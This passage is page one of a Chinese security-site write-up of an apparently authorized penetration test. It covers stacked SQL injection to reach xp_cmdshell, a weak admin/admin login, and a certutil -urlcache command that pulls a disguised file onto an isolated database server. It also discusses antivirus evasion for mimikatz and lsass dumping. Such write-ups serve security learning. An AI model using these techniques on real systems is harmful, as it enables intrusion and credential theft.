欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

记一次授权网络攻防演练:屡败屡战的一次实战经历

来源:本站整理 作者:佚名 时间:2020-03-09 TAG: 我要投稿

本文仅限技术研究与讨论,仅用于信息防御技术,严禁用于非法用途,否则产生的一切后果自行承担! 
这几天为了给大家分享技术干货,可以用废寝忘食来形容了!现在疫情还是依旧很严峻,大家还是呆在家里安安静静看我的文章吧,别出去溜达了!如果我的技术搞能让你呆在家里,我也算为社会做贡献了哈!
本次的技术搞还得从去年护网开始说起,当时我被甲方邀请作为攻击手,对他们的系统做定向授权渗透,只要getshell,就有8000元的奖励!作为一名白帽子,啥也不说了,开干!一开始以为会比较顺利,但是……

0×01 渗透复盘
众所周知,一次完整的攻击流程包括:信息搜集、漏洞利用、建立据点、权限提升、权限维持、横向移动、痕迹清除等7步。
一切一切的起源来自于一个注入点……
http://www.z*****.com/****.aspx?lmid=11&acid=38917

Note:mssql的DBA权限,有点渗透经验的人,看到这个画面就知道这个站已经死了……
But !!! 事实总是那么出乎意料 
由于支持堆叠注入,堆叠注入大家应该都熟悉吧!我就不废话了,经过–os-shell调用xp_cmdshell,发现是system权限,但是执行各种命令后绝望的发现—>库站分离+数据库服务器不通外网。 更绝望的是,数据库服务器上有NOD32,关于这个玩意咱们以后再说。

数据库不通外网,只能从网站后台下手,悲催的是我一没找到后台,二没admin相关表名
那就只能旁站了,如果能找到aspx的旁站,也许使用的是同一个数据库,这样我跨库找admin密码还是很有机会的!
然而结果旁站不是报502就是直接跳转到其他子域名的登录界面,和无语。。。。。。
事情反常,必有妖!这个时候我意识到好像是条”大鱼”(有一些子域名,有单独的登录域名,旁站都是该网站的相关站点)
既然探测到一些子域名,那我们继续挖掘更多的子域名。
给大家分享2个很好用的子域名挖掘神器吧 
https://phpinfo.me/domain/   
还有我最喜欢的subDomainsBrute

挖到域名后,弱密码admin/admin进入 后台(http://*p.z****.com/admin )
但这个后台是java写的,上传点只有ckfinder,这个编辑器也是无解的

我试图在后台找到注入点,然而并没有,并且就算有注入点,由于我已经进了后台,大概率对我也没有鸟帮助!
看起来这个后台和前面的数据库一样,并没有什么卵用,但是两者可以进行一定配合来抓取数据库服务器的administrator密码,如果有windows密码的话,可能用来登录外网哈
服务器的3389端口,因为大部分管理员都喜欢设置成同一个密码。
数据库虽然不通外网,但是他们内网对自己公司的外网域名还是解析的—>我可以通过这个后台来向内网传递文件,开心开心!
我先在http://*p.z****.com/admin上传1.flv文件,由于图片文件有文件内容检测,so,只能传flash文件

然后在http://www.z*****.com/的注入点上用xp_cmdshell执行:
certutil -urlcache -split -f http://*p.z****.com/upload/1.flv 

成功传递文件
然而噩梦才刚刚开始……  NOD32杀掉了一切mimikatz变形工具
从如下检测链接可以看出来,NOD32和卡巴斯基不愧为最强杀毒,其他杀软的静态查杀全部miss,只有这两个绕不过去
http://r.virscan.org/language/zh … 4e60e71747398c9bc9e
这个时候我就特怀念起procdump了,虽然每次使用都需要下载一个30M-100M的lsass.dmp文件,但确实免杀好用。但就算把procdump上传上去了,我该如何把lsass.dmp文件传递出来呢?
Bingo!
这里我想到了curl.exe,用curl.exe是可以加cookie上传的,但是http://*p.z****.com/admin最大只支持2M文件上传。我既无法将curl.exe传递进去,也无法将lsass.dmp文件传递出来。也许还有文件压缩分割的办法,但实在太麻烦,还不如去找其他免杀的!
我找啊找……  皇天不负有心人,我终于找到了能免杀NOD32的mimikatz变形工具。
https://github.com/3gstudent/Hom … ekurlsa-wdigest.cpp

[1] [2] [3]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载